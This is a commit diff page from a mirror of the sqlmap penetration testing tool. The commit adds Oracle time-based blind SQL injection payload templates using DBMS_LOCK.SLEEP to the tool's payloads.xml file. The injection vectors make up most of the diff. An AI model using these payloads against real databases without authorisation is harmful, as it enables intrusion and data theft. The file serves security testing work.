sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

added new Oracle time-based payloads

Browse Source
This commit is contained in:
Bernardo Damele 2014-04-09 12:14:16 +00:00
parent 2d3a74a0fe
commit 9b0662d1a9
1 changed files with 40 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
xml/payloads.xml
View File

@ -3325,7 +3325,26 @@ Formats:
</test>
<test>
<title>Oracle time-based blind - Parameter replace</title>
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype>
<level>3</level>
<risk>0</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</vector>
<request>
<payload>(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
@ -3605,7 +3624,26 @@ Formats:
</test>
<test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
<stype>5</stype>
<level>3</level>
<risk>0</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</vector>
<request>
<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>